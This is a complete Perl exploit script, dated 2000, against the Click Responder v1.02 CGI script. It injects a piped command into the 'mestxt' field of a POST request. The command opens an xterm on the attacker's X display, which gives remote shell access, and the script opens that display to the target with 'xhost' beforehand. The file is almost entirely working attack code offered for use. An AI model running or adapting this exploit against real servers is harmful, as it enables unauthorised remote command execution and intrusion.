#!/usr/bin/perl -w ## Click Responder v1.02 exploit, by Luke and Mark Pfeifer. ## Just a old and free cgi-script which is vulnerable to the ## pesky pipe! ;) After writing my first exploit, this goes ## fast - I just have to change a few fields! ## ## - teleh0r@doglover.com / anno 2000 - ## http://teleh0r.cjb.net use strict; use Socket; if (@ARGV < 3) { print("Usage: $0 \n"); exit(1); } my($target,$attacker,$dpy,$length,$command, $agent,$sploit,$iaddr,$paddr,$proto); ($target,$attacker,$dpy) = @ARGV; if ($dpy !~ /\d/) { print("dpy must be a number, probably 0\n"); exit(1); } print("\nRemote host: $target\n"); print("CGI-script: /cgi-bin/clickresponder.pl\n"); print("Command: xterm -ut -display $attacker:$dpy\n\n"); system("xhost + $target"); $length = 87 + length($attacker.$dpy); $command = "go_to=&mestxt=%7Cxterm+-ut+-display+$attacker%3A$dpy%7C&subject". "=subject+here&send_to=hass\@hass.com"; $agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"; # heh ;) $sploit= "POST /cgi-bin/clickresponder.pl HTTP/1.0 Connection: close User-Agent: $agent Host: $target Content-type: application/x-www-form-urlencoded Content-length: $length $command"; $iaddr = inet_aton($target) || die("Error: $!\n"); $paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n"); $proto = getprotobyname('tcp') || die("Error: $!\n"); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); send(SOCKET,"$sploit\015\012", 0) || die("Error: $!\n"); close(SOCKET); sleep(3); system("xhost - $target"); print("\nAll done - hopefully you got the flying xterm!\n"); exit(0); # www.hack.co.za [26 July 2000]#